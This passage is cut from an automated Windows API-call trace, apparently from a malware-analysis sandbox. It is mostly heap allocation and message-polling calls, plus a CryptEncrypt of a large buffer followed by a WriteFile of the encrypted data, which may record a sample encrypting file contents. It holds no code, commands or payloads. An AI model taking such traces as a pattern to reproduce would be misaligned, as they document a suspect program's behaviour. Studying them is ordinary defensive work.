out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0215.535] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0215.535] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab788 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.535] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.535] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab980 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8d8 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.536] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73aa0 | out: hHeap=0x2af0000) returned 1 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.536] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.536] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0215.536] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.536] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.536] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72558 | out: hHeap=0x2af0000) returned 1 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0215.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0215.537] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72558 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab818 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.537] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0215.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab920 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.537] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.537] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.537] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0215.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0215.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.537] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.538] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0215.538] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.538] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0215.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0215.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.540] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabba8 | out: hHeap=0x2af0000) returned 1 [0215.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab920 | out: hHeap=0x2af0000) returned 1 [0215.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.541] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3911030 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0215.546] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0215.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0215.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0215.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0215.547] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0215.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.547] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabcf8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.547] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x55000, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x55008) returned 1 [0215.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.547] CharLowerBuffW (in: lpsz="byte[348168]", cchLength=0xc | out: lpsz="byte[348168]") returned 0xc [0215.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.563] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.563] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.563] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.563] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.563] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.563] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.568] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.568] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3911030*, pdwDataLen=0x8cef60*=0x55000, dwBufLen=0x55008 | out: pbData=0x3911030*, pdwDataLen=0x8cef60*=0x55008) returned 1 [0215.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.580] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.585] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.585] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.585] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.585] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.585] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.585] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.585] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.585] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.585] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.585] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.585] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.585] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.585] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.585] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.585] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.586] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.586] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.586] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.586] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.586] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.586] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.613] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.613] WriteFile (in: hFile=0x504, lpBuffer=0x518a008*, nNumberOfBytesToWrite=0x55008, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x518a008*, lpNumberOfBytesWritten=0x8cf5e4*=0x55008, lpOverlapped=0x0) returned 1 [0215.620] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.620] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.620] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0215.620] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.620] 